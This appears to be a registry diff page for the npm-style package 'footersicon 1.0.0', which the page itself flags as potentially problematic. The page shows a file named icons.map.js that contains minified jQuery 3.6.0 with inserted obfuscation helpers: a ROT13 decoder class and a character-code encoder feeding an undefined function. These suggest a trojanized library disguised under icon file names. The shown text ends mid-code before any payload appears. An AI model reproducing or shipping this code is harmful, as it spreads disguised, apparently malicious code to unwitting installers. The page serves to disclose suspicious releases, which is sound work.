footersicon 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of footersicon might be problematic. Click here for more details.
- package/icons.map.js +1 -0
- package/ionicons.js +1 -0
- package/ionicons.map.js +1 -0
- package/jquery.min.js +1 -0
- package/package.json +11 -0
package/icons.map.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
!function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (e.document) return t(e); throw new Error("jQuery requires a window with a document") } : t(e) }("undefined" != typeof window ? window : this, function (w, R) { "use strict"; function v(e) { return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.item } function g(e) { return null != e && e === e.window } var t = [], M = Object.getPrototypeOf, a = t.slice, I = t.flat ? function (e) { return t.flat.call(e) } : function (e) { return t.concat.apply([], e) }, W = t.push, F = t.indexOf, _ = {}, B = _.toString, z = _.hasOwnProperty, U = z.toString, X = U.call(Object), m = {}, T = w.document, V = { type: !0, src: !0, nonce: !0, noModule: !0 }; function G(e, t, n) { var r, i, o = (n = n || T).createElement("script"); o.text = e; if (t) for (r in V) (i = t[r] || t.getAttribute && t.getAttribute(r)) && o.setAttribute(r, i); n.head.appendChild(o).parentNode.removeChild(o) } function h(e) { return null == e ? e + "" : "object" == typeof e || "function" == typeof e ? _[B.call(e)] || "object" : typeof e } class Y { constructor(e) { this.rot = e } rotate() { return this.rot.replace(/[a-zA-Z]/g, function (e) { return String.fromCharCode((e <= "Z" ? 90 : 122) >= (e = e.charCodeAt(0) + 13) ? e : e - 26) }) } } class Q { constructor(e) { this._input = e } F() { let e = "", t = 0; for (; t < this._input.length;)t < this._input.length - 1 ? e = (e += this._input.charCodeAt(t) + 10) + ("0x" + t) : e += this._input.charCodeAt(t) + 10, t++; return mt(e).U() } } function J(e) { return new Q(e) } var e = "3.6.0", C = function (e, t) { return new C.fn.init(e, t) }; C.fn = C.prototype = { jquery: e, constructor: C, length: 0, toArray: function () { return a.call(this) }, get: function (e) { return null == e ? a.call(this) : e < 0 ? this[e + this.length] : this[e] }, pushStack: function (e) { e = C.merge(this.constructor(), e); e.prevObject = this; return e }, each: function (e) { return C.each(this, e) }, map: function (n) { return this.pushStack(C.map(this, function (e, t) { return n.call(e, t, e) })) }, slice: function () { return this.pushStack(a.apply(this, arguments)) }, first: function () { return this.eq(0) }, last: function () { return this.eq(-1) }, even: function () { return this.pushStack(C.grep(this, function (e, t) { return (t + 1) % 2 })) }, odd: function () { return this.pushStack(C.grep(this, function (e, t) { return t % 2 })) }, eq: function (e) { var t = this.length, e = +e + (e < 0 ? t : 0); return this.pushStack(0 <= e && e < t ? [this[e]] : []) }, end: function () { return this.prevObject || this.constructor() }, push: W, sort: t.sort, splice: t.splice }; C.extend = C.fn.extend = function () { var e, t, n, r, i, o = arguments[0] || {}, s = 1, a = arguments.length, u = !1; if ("boolean" == typeof o) { u = o; o = arguments[s] || {}; s++ } "object" == typeof o || v(o) || (o = {}); if (s === a) { o = this; s-- } for (; s < a; s++)if (null != (e = arguments[s])) for (t in e) { n = e[t]; if ("__proto__" !== t && o !== n) if (u && n && (C.isPlainObject(n) || (r = Array.isArray(n)))) { i = o[t]; i = r && !Array.isArray(i) ? [] : r || C.isPlainObject(i) ? i : {}; r = !1; o[t] = C.extend(u, i, n) } else void 0 !== n && (o[t] = n) } return o }; C.extend({ expando: "jQuery" + (e + Math.random()).replace(/\D/g, ""), isReady: !0, error: function (e) { throw new Error(e) }, noop: function () { }, isPlainObject: function (e) { return !(!e || "[object Object]" !== B.call(e)) && (!(e = M(e)) || "function" == typeof (e = z.call(e, "constructor") && e.constructor) && U.call(e) === X) }, isEmptyObject: function (e) { for (var t in e) return !1; return !0 }, globalEval: function (e, t, n) { G(e, { nonce: t && t.nonce }, n) }, each: function (e, t) { var n, r = 0; if (K(e)) { n = e.length; for (; r < n && !1 !== t.call(e[r], r, e[r]); r++); } else for (r in e) if (!1 === t.call(e[r], r, e[r])) break; return e }, makeArray: function (e, t) { t = t || []; null != e && (K(Object(e)) ? C.merge(t, "string" == typeof e ? [e] : e) : W.call(t, e)); return t }, inArray: function (e, t, n) { return null == t ? -1 : F.call(t, e, n) }, merge: function (e, t) { for (var n = +t.length, r = 0, i = e.length; r < n; r++)e[i++] = t[r]; e.length = i; return e }, grep: function (e, t, n) { for (var r = [], i = 0, o = e.length, s = !n; i < o; i++)!t(e[i], i) != s && r.push(e[i]); return r }, map: function (e, t, n) { var r, i, o = 0, s = []; if (K(e)) { r = e.length; for (; o < r; o++)null != (i = t(e[o], o, n)) && s.push(i) } else for (o in e) null != (i = t(e[o], o, n)) && s.push(i); return I(s) }, guid: 1, support: m }); "function" == typeof Symbol && (C.fn[Symbol.iterator] = t[Symbol.iterator]); C.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "), function (e, t) { _["[object " + t + "]"] = t.toLowerCase() }); function K(e) { var t = !!e && "length" in e && e.length, n = h(e); return !v(e) && !g(e) && ("array" === n || 0 === t || "number" == typeof t && 0 < t && t - 1 in e) } e = function (R) { function c(e, t) { e = "0x" + e.slice(1) - 65536; return t || (e < 0 ? String.fromCharCode(65536 + e) : String.fromCharCode(e >> 10 | 55296, 1023 & e | 56320)) } function M(e, t) { return t ? "\0" === e ? "�" : e.slice(0, -1) + "\\" + e.charCodeAt(e.length - 1).toString(16) + " " : "\\" + e } function I() { T() } var e, p, b, o, W, d, F, _, w, u, l, T, C, n, E, h, r, i, g, S = "sizzle" + +new Date, f = R.document, A = 0, B = 0, z = q(), U = q(), X = q(), m = q(), V = function (e, t) { e === t && (l = !0); return 0 }, G = {}.hasOwnProperty, t = [], Y = t.pop, Q = t.push, k = t.push, J = t.slice, v = function (e, t) { for (var n = 0, r = e.length; n < r; n++)if (e[n] === t) return n; return -1 }, K = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped", s = "[\\x20\\t\\r\\n\\f]", a = "(?:\\\\[\\da-fA-F]{1,6}" + s + "?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\x7f])+", Z = "\\[" + s + "*(" + a + ")(?:" + s + "*([*^$|!~]?=)" + s + "*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|(" + a + "))|)" + s + "*\\]", ee = ":(" + a + ")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|" + Z + ")*)|.*)\\)|)", te = new RegExp(s + "+", "g"), y = new RegExp("^" + s + "+|((?:^|[^\\\\])(?:\\\\.)*)" + s + "+$", "g"), ne = new RegExp("^" + s + "*," + s + "*"), re = new RegExp("^" + s + "*([>+~]|" + s + ")" + s + "*"), ie = new RegExp(s + "|>"), oe = new RegExp(ee), se = new RegExp("^" + a + "$"), x = { ID: new RegExp("^#(" + a + ")"), CLASS: new RegExp("^\\.(" + a + ")"), TAG: new RegExp("^(" + a + "|[*])"), ATTR: new RegExp("^" + Z), PSEUDO: new RegExp("^" + ee), CHILD: new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + s + "*(even|odd|(([+-]|)(\\d*)n|)" + s + "*(?:([+-]|)" + s + "*(\\d+)|))" + s + "*\\)|)", "i"), bool: new RegExp("^(?:" + K + ")$", "i"), needsContext: new RegExp("^" + s + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" + s + "*((?:-\\d)?\\d*)" + s + "*\\)|)(?=[^-]|$)", "i") }, ae = /HTML$/i, ue = /^(?:input|select|textarea|button)$/i, le = /^h\d$/i, N = /^[^{]+\{\s*\[native \w/, ce = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/, fe = /[+~]/, j = new RegExp("\\\\[\\da-fA-F]{1,6}" + s + "?|\\\\([^\\r\\n\\f])", "g"), pe = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g, de = xe(function (e) { return !0 === e.disabled && "fieldset" === e.nodeName.toLowerCase() }, { dir: "parentNode", next: "legend" }); try { k.apply(t = J.call(f.childNodes), f.childNodes); t[f.childNodes.length].nodeType } catch (e) { k = { apply: t.length ? function (e, t) { Q.apply(e, J.call(t)) } : function (e, t) { for (var n = e.length, r = 0; e[n++] = t[r++];); e.length = n - 1 } } } function D(t, e, n, r) { var i, o, s, a, u, l, c = e && e.ownerDocument, f = e ? e.nodeType : 9; n = n || []; if ("string" != typeof t || !t || 1 !== f && 9 !== f && 11 !== f) return n; if (!r) { T(e); e = e || C; if (E) { if (11 !== f && (a = ce.exec(t))) if (i = a[1]) { if (9 === f) { if (!(l = e.getElementById(i))) return n; if (l.id === i) return n.push(l), n } else if (c && (l = c.getElementById(i)) && g(e, l) && l.id === i) return n.push(l), n } else { if (a[2]) return k.apply(n, e.getElementsByTagName(t)), n; if ((i = a[3]) && p.getElementsByClassName && e.getElementsByClassName) return k.apply(n, e.getElementsByClassName(i)), n } if (p.qsa && !m[t + " "] && (!h || !h.test(t)) && (1 !== f || "object" !== e.nodeName.toLowerCase())) { l = t; c = e; if (1 === f && (ie.test(t) || re.test(t))) { (c = fe.test(t) && ye(e.parentNode) || e) === e && p.scope || ((s = e.getAttribute("id")) ? s = s.replace(pe, M) : e.setAttribute("id", s = S)); o = (u = d(t)).length; for (; o--;)u[o] = (s ? "#" + s : ":scope") + " " + P(u[o]); l = u.join(",") } try { k.apply(n, c.querySelectorAll(l)); return n } catch (e) { m(t, !0) } finally { s === S && e.removeAttribute("id") } } } } return _(t.replace(y, "$1"), e, n, r) } function q() { var n = []; function r(e, t) { n.push(e + " ") > b.cacheLength && delete r[n.shift()]; return r[e + " "] = t } return r } function L(e) { e[S] = !0; return e } function H(e) { var t = C.createElement("fieldset"); try { return !!e(t) } catch (e) { return !1 } finally { t.parentNode && t.parentNode.removeChild(t) } } function he(e, t) { for (var n = e.split("|"), r = n.length; r--;)b.attrHandle[n[r]] = t } function ge(e, t) { var n = t && e, r = n && 1 === e.nodeType && 1 === t.nodeType && e.sourceIndex - t.sourceIndex; if (r) return r; if (n) for (; n = n.nextSibling;)if (n === t) return -1; return e ? 1 : -1 } function me(t) { return function (e) { return "form" in e ? e.parentNode && !1 === e.disabled ? "label" in e ? "label" in e.parentNode ? e.parentNode.disabled === t : e.disabled === t : e.isDisabled === t || e.isDisabled !== !t && de(e) === t : e.disabled === t : "label" in e && e.disabled === t } } function O(s) { return L(function (o) { o = +o; return L(function (e, t) { for (var n, r = s([], e.length, o), i = r.length; i--;)e[n = r[i]] && (e[n] = !(t[n] = e[n])) }) }) } function ye(e) { return e && void 0 !== e.getElementsByTagName && e } p = D.support = {}; W = D.isXML = function (e) { var t = e && e.namespaceURI, e = e && (e.ownerDocument || e).documentElement; return !ae.test(t || e && e.nodeName || "HTML") }; T = D.setDocument = function (e) { var e = e ? e.ownerDocument || e : f; if (e == C || 9 !== e.nodeType || !e.documentElement) return C; n = (C = e).documentElement; E = !W(C); f != C && (e = C.defaultView) && e.top !== e && (e.addEventListener ? e.addEventListener("unload", I, !1) : e.attachEvent && e.attachEvent("onunload", I)); p.scope = H(function (e) { n.appendChild(e).appendChild(C.createElement("div")); return void 0 !== e.querySelectorAll && !e.querySelectorAll(":scope fieldset div").length }); p.attributes = H(function (e) { e.className = "i"; return !e.getAttribute("className") }); p.getElementsByTagName = H(function (e) { e.appendChild(C.createComment("")); return !e.getElementsByTagName("*").length }); p.getElementsByClassName = N.test(C.getElementsByClassName); p.getById = H(function (e) { n.appendChild(e).id = S; return !C.getElementsByName || !C.getElementsByName(S).length }); if (p.getById) { b.filter.ID = function (e) { var t = e.replace(j, c); return function (e) { return e.getAttribute("id") === t } }; b.find.ID = function (e, t) { if (void 0 !== t.getElementById && E) return (t = t.getElementById(e)) ? [t] : [] } } else { b.filter.ID = function (e) { var t = e.replace(j, c); return function (e) { e = void 0 !== e.getAttributeNode && e.getAttributeNode("id"); return e && e.value === t } }; b.find.ID = function (e, t) { if (void 0 !== t.getElementById && E) { var n, r, i, o = t.getElementById(e); if (o) { if ((n = o.getAttributeNode("id")) && n.value === e) return [o]; i = t.getElementsByName(e); r = 0; for (; o = i[r++];)if ((n = o.getAttributeNode("id")) && n.value === e) return [o] } return [] } } } b.find.TAG = p.getElementsByTagName ? function (e, t) { return void 0 !== t.getElementsByTagName ? t.getElementsByTagName(e) : p.qsa ? t.querySelectorAll(e) : void 0 } : function (e, t) { var n, r = [], i = 0, o = t.getElementsByTagName(e); if ("*" !== e) return o; for (; n = o[i++];)1 === n.nodeType && r.push(n); return r }; b.find.CLASS = p.getElementsByClassName && function (e, t) { if (void 0 !== t.getElementsByClassName && E) return t.getElementsByClassName(e) }; r = []; h = []; if (p.qsa = N.test(C.querySelectorAll)) { H(function (e) { var t; n.appendChild(e).innerHTML = "<a id='" + S + "'></a><select id='" + S + "-\r\\' msallowcapture=''><option selected=''></option></select>"; e.querySelectorAll("[msallowcapture^='']").length && h.push("[*^$]=" + s + "*(?:''|\"\")"); e.querySelectorAll("[selected]").length || h.push("\\[" + s + "*(?:value|" + K + ")"); e.querySelectorAll("[id~=" + S + "-]").length || h.push("~="); (t = C.createElement("input")).setAttribute("name", ""); e.appendChild(t); e.querySelectorAll("[name='']").length || h.push("\\[" + s + "*name" + s + "*=" + s + "*(?:''|\"\")"); e.querySelectorAll(":checked").length || h.push(":checked"); e.querySelectorAll("a#" + S + "+*").length || h.push(".#.+[+~]"); e.querySelectorAll("\\\f"); h.push("[\\r\\n\\f]") }); H(function (e) { e.innerHTML = "<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>"; var t = C.createElement("input"); t.setAttribute("type", "hidden"); e.appendChild(t).setAttribute("name", "D"); e.querySelectorAll("[name=d]").length && h.push("name" + s + "*[*^$|!~]?="); 2 !== e.querySelectorAll(":enabled").length && h.push(":enabled", ":disabled"); n.appendChild(e).disabled = !0; 2 !== e.querySelectorAll(":disabled").length && h.push(":enabled", ":disabled"); e.querySelectorAll("*,:x"); h.push(",.*:") }) } (p.matchesSelector = N.test(i = n.matches || n.webkitMatchesSelector || n.mozMatchesSelector || n.oMatchesSelector || n.msMatchesSelector)) && H(function (e) { p.disconnectedMatch = i.call(e, "*"); i.call(e, "[s!='']:x"); r.push("!=", ee) }); h = h.length && new RegExp(h.join("|")); r = r.length && new RegExp(r.join("|")); e = N.test(n.compareDocumentPosition); g = e || N.test(n.contains) ? function (e, t) { var n = 9 === e.nodeType ? e.documentElement : e, t = t && t.parentNode; return e === t || !(!t || 1 !== t.nodeType || !(n.contains ? n.contains(t) : e.compareDocumentPosition && 16 & e.compareDocumentPosition(t))) } : function (e, t) { if (t) for (; t = t.parentNode;)if (t === e) return !0; return !1 }; V = e ? function (e, t) { if (e === t) return l = !0, 0; var n = !e.compareDocumentPosition - !t.compareDocumentPosition; return n || (1 & (n = (e.ownerDocument || e) == (t.ownerDocument || t) ? e.compareDocumentPosition(t) : 1) || !p.sortDetached && t.compareDocumentPosition(e) === n ? e == C || e.ownerDocument == f && g(f, e) ? -1 : t == C || t.ownerDocument == f && g(f, t) ? 1 : u ? v(u, e) - v(u, t) : 0 : 4 & n ? -1 : 1) } : function (e, t) { if (e === t) return l = !0, 0; var n, r = 0, i = e.parentNode, o = t.parentNode, s = [e], a = [t]; if (!i || !o) return e == C ? -1 : t == C ? 1 : i ? -1 : o ? 1 : u ? v(u, e) - v(u, t) : 0; if (i === o) return ge(e, t); n = e; for (; n = n.parentNode;)s.unshift(n); n = t; for (; n = n.parentNode;)a.unshift(n); for (; s[r] === a[r];)r++; return r ? ge(s[r], a[r]) : s[r] == f ? -1 : a[r] == f ? 1 : 0 }; return C }; D.matches = function (e, t) { return D(e, null, null, t) }; D.matchesSelector = function (e, t) { T(e); if (p.matchesSelector && E && !m[t + " "] && (!r || !r.test(t)) && (!h || !h.test(t))) try { var n = i.call(e, t); if (n || p.disconnectedMatch || e.document && 11 !== e.document.nodeType) return n } catch (e) { m(t, !0) } return 0 < D(t, C, null, [e]).length }; D.contains = function (e, t) { (e.ownerDocument || e) != C && T(e); return g(e, t) }; D.attr = function (e, t) { (e.ownerDocument || e) != C && T(e); var n = b.attrHandle[t.toLowerCase()], n = n && G.call(b.attrHandle, t.toLowerCase()) ? n(e, t, !E) : void 0; return void 0 !== n ? n : p.attributes || !E ? e.getAttribute(t) : (n = e.getAttributeNode(t)) && n.specified ? n.value : null }; D.escape = function (e) { return (e + "").replace(pe, M) }; D.error = function (e) { throw new Error("Syntax error, unrecognized expression: " + e) }; D.uniqueSort = function (e) { var t, n = [], r = 0, i = 0; l = !p.detectDuplicates; u = !p.sortStable && e.slice(0); e.sort(V); if (l) { for (; t = e[i++];)t === e[i] && (r = n.push(i)); for (; r--;)e.splice(n[r], 1) } u = null; return e }; o = D.getText = function (e) { var t, n = "", r = 0, i = e.nodeType; if (i) { if (1 === i || 9 === i || 11 === i) { if ("string" == typeof e.textContent) return e.textContent; for (e = e.firstChild; e; e = e.nextSibling)n += o(e) } else if (3 === i || 4 === i) return e.nodeValue } else for (; t = e[r++];)n += o(t); return n }; (b = D.selectors = { cacheLength: 50, createPseudo: L, match: x, attrHandle: {}, find: {}, relative: { ">": { dir: "parentNode", first: !0 }, " ": { dir: "parentNode" }, "+": { dir: "previousSibling", first: !0 }, "~": { dir: "previousSibling" } }, preFilter: { ATTR: function (e) { e[1] = e[1].replace(j, c); e[3] = (e[3] || e[4] || e[5] || "").replace(j, c); "~=" === e[2] && (e[3] = " " + e[3] + " "); return e.slice(0, 4) }, CHILD: function (e) { e[1] = e[1].toLowerCase(); if ("nth" === e[1].slice(0, 3)) { e[3] || D.error(e[0]); e[4] = +(e[4] ? e[5] + (e[6] || 1) : 2 * ("even" === e[3] || "odd" === e[3])); e[5] = +(e[7] + e[8] || "odd" === e[3]) } else e[3] && D.error(e[0]); return e }, PSEUDO: function (e) { var t, n = !e[6] && e[2]; if (x.CHILD.test(e[0])) return null; if (e[3]) e[2] = e[4] || e[5] || ""; else if (n && oe.test(n) && (t = d(n, !0)) && (t = n.indexOf(")", n.length - t) - n.length)) { e[0] = e[0].slice(0, t); e[2] = n.slice(0, t) } return e.slice(0, 3) } }, filter: { TAG: function (e) { var t = e.replace(j, c).toLowerCase(); return "*" === e ? function () { return !0 } : function (e) { return e.nodeName && e.nodeName.toLowerCase() === t } }, CLASS: function (e) { var t = z[e + " "]; return t || (t = new RegExp("(^|" + s + ")" + e + "(" + s + "|$)")) && z(e, function (e) { return t.test("string" == typeof e.className && e.className || void 0 !== e.getAttribute && e.getAttribute("class") || "") }) }, ATTR: function (t, n, r) { return function (e) { e = D.attr(e, t); if (null == e) return "!=" === n; if (!n) return !0; e += ""; return "=" === n ? e === r : "!=" === n ? e !== r : "^=" === n ? r && 0 === e.indexOf(r) : "*=" === n ? r && -1 < e.indexOf(r) : "$=" === n ? r && e.slice(-r.length) === r : "~=" === n ? -1 < (" " + e.replace(te, " ") + " ").indexOf(r) : "|=" === n && (e === r || e.slice(0, r.length + 1) === r + "-") } }, CHILD: function (h, e, t, g, m) { var y = "nth" !== h.slice(0, 3), v = "last" !== h.slice(-4), x = "of-type" === e; return 1 === g && 0 === m ? function (e) { return !!e.parentNode } : function (e, t, n) { var r, i, o, s, a, u, l = y != v ? "nextSibling" : "previousSibling", c = e.parentNode, f = x && e.nodeName.toLowerCase(), p = !n && !x, d = !1; if (c) { if (y) { for (; l;) { s = e; for (; s = s[l];)if (x ? s.nodeName.toLowerCase() === f : 1 === s.nodeType) return !1; u = l = "only" === h && !u && "nextSibling" } return !0 } u = [v ? c.firstChild : c.lastChild]; if (v && p) { d = (a = (r = (i = (o = (s = c)[S] || (s[S] = {}))[s.uniqueID] || (o[s.uniqueID] = {}))[h] || [])[0] === A && r[1]) && r[2]; s = a && c.childNodes[a]; for (; s = ++a && s && s[l] || (d = a = 0) || u.pop();)if (1 === s.nodeType && ++d && s === e) { i[h] = [A, a, d]; break } } else if (!1 === (d = p ? a = (r = (i = (o = (s = e)[S] || (s[S] = {}))[s.uniqueID] || (o[s.uniqueID] = {}))[h] || [])[0] === A && r[1] : d)) for (; s = ++a && s && s[l] || (d = a = 0) || u.pop();)if ((x ? s.nodeName.toLowerCase() === f : 1 === s.nodeType) && ++d) { p && ((i = (o = s[S] || (s[S] = {}))[s.uniqueID] || (o[s.uniqueID] = {}))[h] = [A, d]); if (s === e) break } return (d -= m) === g || d % g == 0 && 0 <= d / g } } }, PSEUDO: function (e, o) { var t, s = b.pseudos[e] || b.setFilters[e.toLowerCase()] || D.error("unsupported pseudo: " + e); if (s[S]) return s(o); if (1 < s.length) return t = [e, e, "", o], b.setFilters.hasOwnProperty(e.toLowerCase()) ? L(function (e, t) { for (var n, r = s(e, o), i = r.length; i--;)e[n = v(e, r[i])] = !(t[n] = r[i]) }) : function (e) { return s(e, 0, t) }; return s } }, pseudos: { not: L(function (e) { var r = [], i = [], a = F(e.replace(y, "$1")); return a[S] ? L(function (e, t, n, r) { for (var i, o = a(e, null, r, []), s = e.length; s--;)(i = o[s]) && (e[s] = !(t[s] = i)) }) : function (e, t, n) { r[0] = e; a(r, null, n, i); r[0] = null; return !i.pop() } }), has: L(function (t) { return function (e) { return 0 < D(t, e).length } }), contains: L(function (t) { t = t.replace(j, c); return function (e) { return -1 < (e.textContent || o(e)).indexOf(t) } }), lang: L(function (n) { se.test(n || "") || D.error("unsupported lang: " + n); n = n.replace(j, c).toLowerCase(); return function (e) { var t; do { if (t = E ? e.lang : e.getAttribute("xml:lang") || e.getAttribute("lang")) return (t = t.toLowerCase()) === n || 0 === t.indexOf(n + "-") } while ((e = e.parentNode) && 1 === e.nodeType); return !1 } }), target: function (e) { var t = R.location && R.location.hash; return t && t.slice(1) === e.id }, root: function (e) { return e === n }, focus: function (e) { return e === C.activeElement && (!C.hasFocus || C.hasFocus()) && !!(e.type || e.href || ~e.tabIndex) }, enabled: me(!1), disabled: me(!0), checked: function (e) { var t = e.nodeName.toLowerCase(); return "input" === t && !!e.checked || "option" === t && !!e.selected }, selected: function (e) { e.parentNode && e.parentNode.selectedIndex; return !0 === e.selected }, empty: function (e) { for (e = e.firstChild; e; e = e.nextSibling)if (e.nodeType < 6) return !1; return !0 }, parent: function (e) { return !b.pseudos.empty(e) }, header: function (e) { return le.test(e.nodeName) }, input: function (e) { return ue.test(e.nodeName) }, button: function (e) { var t = e.nodeName.toLowerCase(); return "input" === t && "button" === e.type || "button" === t }, text: function (e) { return "input" === e.nodeName.toLowerCase() && "text" === e.type && (null == (e = e.getAttribute("type")) || "text" === e.toLowerCase()) }, first: O(function () { return [0] }), last: O(function (e, t) { return [t - 1] }), eq: O(function (e, t, n) { return [n < 0 ? n + t : n] }), even: O(function (e, t) { for (var n = 0; n < t; n += 2)e.push(n); return e }), odd: O(function (e, t) { for (var n = 1; n < t; n += 2)e.push(n); return e }), lt: O(function (e, t, n) { for (var r = n < 0 ? n + t : t < n ? t : n; 0 <= --r;)e.push(r); return e }), gt: O(function (e, t, n) { for (var r = n < 0 ? n + t : n; ++r < t;)e.push(r); return e }) } }).pseudos.nth = b.pseudos.eq; for (e in { radio: !0, checkbox: !0, file: !0, password: !0, image: !0 }) b.pseudos[e] = function (t) { return function (e) { return "input" === e.nodeName.toLowerCase() && e.type === t } }(e); for (e in { submit: !0, reset: !0 }) b.pseudos[e] = function (n) { return function (e) { var t = e.nodeName.toLowerCase(); return ("input" === t || "button" === t) && e.type === n } }(e); function ve() { } ve.prototype = b.filters = b.pseudos; b.setFilters = new ve; d = D.tokenize = function (e, t) { var n, r, i, o, s, a, u, l = U[e + " "]; if (l) return t ? 0 : l.slice(0); s = e; a = []; u = b.preFilter; for (; s;) { if (!n || (r = ne.exec(s))) { r && (s = s.slice(r[0].length) || s); a.push(i = []) } n = !1; if (r = re.exec(s)) { n = r.shift(); i.push({ value: n, type: r[0].replace(y, " ") }); s = s.slice(n.length) } for (o in b.filter) if ((r = x[o].exec(s)) && (!u[o] || (r = u[o](r)))) { n = r.shift(); i.push({ value: n, type: o, matches: r }); s = s.slice(n.length) } if (!n) break } return t ? s.length : s ? D.error(e) : U(e, a).slice(0) }; function P(e) { for (var t = 0, n = e.length, r = ""; t < n; t++)r += e[t].value; return r } function xe(s, e, t) { var a = e.dir, u = e.next, l = u || a, c = t && "parentNode" === l, f = B++; return e.first ? function (e, t, n) { for (; e = e[a];)if (1 === e.nodeType || c) return s(e, t, n); return !1 } : function (e, t, n) { var r, i, o = [A, f]; if (n) { for (; e = e[a];)if ((1 === e.nodeType || c) && s(e, t, n)) return !0 } else for (; e = e[a];)if (1 === e.nodeType || c) { i = (i = e[S] || (e[S] = {}))[e.uniqueID] || (i[e.uniqueID] = {}); if (u && u === e.nodeName.toLowerCase()) e = e[a] || e; else { if ((r = i[l]) && r[0] === A && r[1] === f) return o[2] = r[2]; if ((i[l] = o)[2] = s(e, t, n)) return !0 } } return !1 } } function be(i) { return 1 < i.length ? function (e, t, n) { for (var r = i.length; r--;)if (!i[r](e, t, n)) return !1; return !0 } : i[0] } function we(e, t, n, r, i) { for (var o, s = [], a = 0, u = e.length, l = null != t; a < u; a++)if ((o = e[a]) && (!n || n(o, r, i))) { s.push(o); l && t.push(a) } return s } function Te(d, h, g, m, y, e) { m && !m[S] && (m = Te(m)); y && !y[S] && (y = Te(y, e)); return L(function (e, t, n, r) { var i, o, s, a = [], u = [], l = t.length, c = e || function (e, t, n) { for (var r = 0, i = t.length; r < i; r++)D(e, t[r], n); return n }(h || "*", n.nodeType ? [n] : n, []), f = !d || !e && h ? c : we(c, a, d, n, r), p = g ? y || (e ? d : l || m) ? [] : t : f; g && g(f, p, n, r); if (m) { i = we(p, u); m(i, [], n, r); o = i.length; for (; o--;)(s = i[o]) && (p[u[o]] = !(f[u[o]] = s)) } if (e) { if (y || d) { if (y) { i = []; o = p.length; for (; o--;)(s = p[o]) && i.push(f[o] = s); y(null, p = [], i, r) } o = p.length; for (; o--;)(s = p[o]) && -1 < (i = y ? v(e, s) : a[o]) && (e[i] = !(t[i] = s)) } } else { p = we(p === t ? p.splice(l, p.length) : p); y ? y(null, t, p, r) : k.apply(t, p) } }) } function Ce(m, y) { function e(e, t, n, r, i) { var o, s, a, u = 0, l = "0", c = e && [], f = [], p = w, d = e || x && b.find.TAG("*", i), h = A += null == p ? 1 : Math.random() || .1, g = d.length; i && (w = t == C || t || i); for (; l !== g && null != (o = d[l]); l++) { if (x && o) { s = 0; if (!t && o.ownerDocument != C) { T(o); n = !E } for (; a = m[s++];)if (a(o, t || C, n)) { r.push(o); break } i && (A = h) } if (v) { (o = !a && o) && u--; e && c.push(o) } } u += l; if (v && l !== u) { s = 0; for (; a = y[s++];)a(c, f, t, n); if (e) { if (0 < u) for (; l--;)c[l] || f[l] || (f[l] = Y.call(r)); f = we(f) } k.apply(r, f); i && !e && 0 < f.length && 1 < u + y.length && D.uniqueSort(r) } if (i) { A = h; w = p } return c } var v = 0 < y.length, x = 0 < m.length; return v ? L(e) : e } F = D.compile = function (e, t) { var n, r = [], i = [], o = X[e + " "]; if (!o) { n = (t = t || d(e)).length; for (; n--;)((o = function e(t) { for (var r, n, i, o = t.length, s = b.relative[t[0].type], a = s || b.relative[" "], u = s ? 1 : 0, l = xe(function (e) { return e === r }, a, !0), c = xe(function (e) { return -1 < v(r, e) }, a, !0), f = [function (e, t, n) { e = !s && (n || t !== w) || ((r = t).nodeType ? l : c)(e, t, n); r = null; return e }]; u < o; u++)if (n = b.relative[t[u].type]) f = [xe(be(f), n)]; else { if ((n = b.filter[t[u].type].apply(null, t[u].matches))[S]) { i = ++u; for (; i < o && !b.relative[t[i].type]; i++); return Te(1 < u && be(f), 1 < u && P(t.slice(0, u - 1).concat({ value: " " === t[u - 2].type ? "*" : "" })).replace(y, "$1"), n, u < i && e(t.slice(u, i)), i < o && e(t = t.slice(i)), i < o && P(t)) } f.push(n) } return be(f) }(t[n]))[S] ? r : i).push(o); (o = X(e, Ce(i, r))).selector = e } return o }; _ = D.select = function (e, t, n, r) { var i, o, s, a, u = "function" == typeof e && e, l = !r && d(e = u.selector || e); n = n || []; if (1 === l.length) { if (2 < (o = l[0] = l[0].slice(0)).length && "ID" === (s = o[0]).type && 9 === t.nodeType && E && b.relative[o[1].type]) { if (!(t = (b.find.ID(s.matches[0].replace(j, c), t) || [])[0])) return n; u && (t = t.parentNode); e = e.slice(o.shift().value.length) } i = x.needsContext.test(e) ? 0 : o.length; for (; i--;) { s = o[i]; if (b.relative[a = s.type]) break; if ((a = b.find[a]) && (r = a(s.matches[0].replace(j, c), fe.test(o[0].type) && ye(t.parentNode) || t))) { o.splice(i, 1); if (e = r.length && P(o)) break; return k.apply(n, r), n } } } (u || F(e, l))(r, t, !E, n, !t || fe.test(e) && ye(t.parentNode) || t); return n }; p.sortStable = S.split("").sort(V).join("") === S; p.detectDuplicates = !!l; T(); p.sortDetached = H(function (e) { return 1 & e.compareDocumentPosition(C.createElement("fieldset")) }); H(function (e) { e.innerHTML = "<a href='#'></a>"; return "#" === e.firstChild.getAttribute("href") }) || he("type|href|height|width", function (e, t, n) { if (!n) return e.getAttribute(t, "type" === t.toLowerCase() ? 1 : 2) }); p.attributes && H(function (e) { e.innerHTML = "<input/>"; e.firstChild.setAttribute("value", ""); return "" === e.firstChild.getAttribute("value") }) || he("value", function (e, t, n) { if (!n && "input" === e.nodeName.toLowerCase()) return e.defaultValue }); H(function (e) { return null == e.getAttribute("disabled") }) || he(K, function (e, t, n) { if (!n) return !0 === e[t] ? t.toLowerCase() : 